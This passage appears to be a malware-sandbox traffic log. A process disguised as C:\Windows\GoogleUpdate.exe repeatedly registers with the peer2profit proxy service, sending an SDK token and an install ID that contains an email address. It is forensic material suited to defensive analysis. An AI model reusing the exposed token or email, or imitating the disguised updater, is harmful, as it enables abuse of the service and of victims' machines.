2023-01-04 15:49:31 UTC	59	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.2.4	49970	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:31 UTC	59	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:31 UTC	59	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:31 UTC	59	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:31 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451fea3f7f6916-FRA
2023-01-04 15:49:31 UTC	59	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.2.4	49973	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:32 UTC	59	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:32 UTC	60	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:32 UTC	60	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:32 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451fec5b429079-FRA
2023-01-04 15:49:32 UTC	60	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.2.4	49976	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:32 UTC	60	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:32 UTC	60	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:32 UTC	60	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:32 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451fee3a24913c-FRA
2023-01-04 15:49:32 UTC	61	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.2.4	49978	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:32 UTC	61	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:32 UTC	61	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:32 UTC	61	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:32 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451feffa0768f8-FRA
2023-01-04 15:49:32 UTC	61	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49724	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:48:25 UTC	6	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:48:25 UTC	6	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:48:25 UTC	6	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:48:25 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451e4afaae9c01-FRA
2023-01-04 15:48:25 UTC	6	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.2.4	49981	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:33 UTC	61	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:33 UTC	62	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:33 UTC	62	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:33 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451ff1bf319122-FRA
2023-01-04 15:49:33 UTC	62	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	192.168.2.4	49984	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:33 UTC	62	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:33 UTC	62	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:33 UTC	63	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:33 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451ff3adf4922f-FRA
2023-01-04 15:49:33 UTC	63	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	192.168.2.4	49988	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:33 UTC	63	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:33 UTC	63	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:33 UTC	63	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:33 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451ff55a529a12-FRA
2023-01-04 15:49:33 UTC	63	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	192.168.2.4	49991	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:33 UTC	64	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:33 UTC	64	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:33 UTC	64	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:33 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451ff709012c32-FRA
2023-01-04 15:49:33 UTC	64	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	192.168.2.4	49994	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:34 UTC	64	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:34 UTC	64	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:34 UTC	65	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:34 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451ff8c8929bec-FRA
2023-01-04 15:49:34 UTC	65	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	192.168.2.4	49998	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:34 UTC	65	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2023-01-04 15:49:34 UTC	65	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2023-01-04 15:49:34 UTC	65	IN	HTTP/1.1 200 OK Date: Wed, 04 Jan 2023 15:49:34 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 78451ffaac829b46-FRA
2023-01-04 15:49:34 UTC	65	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 34 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.248", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	192.168.2.4	50001	172.66.40.196	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-04 15:49:34 UTC	66	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
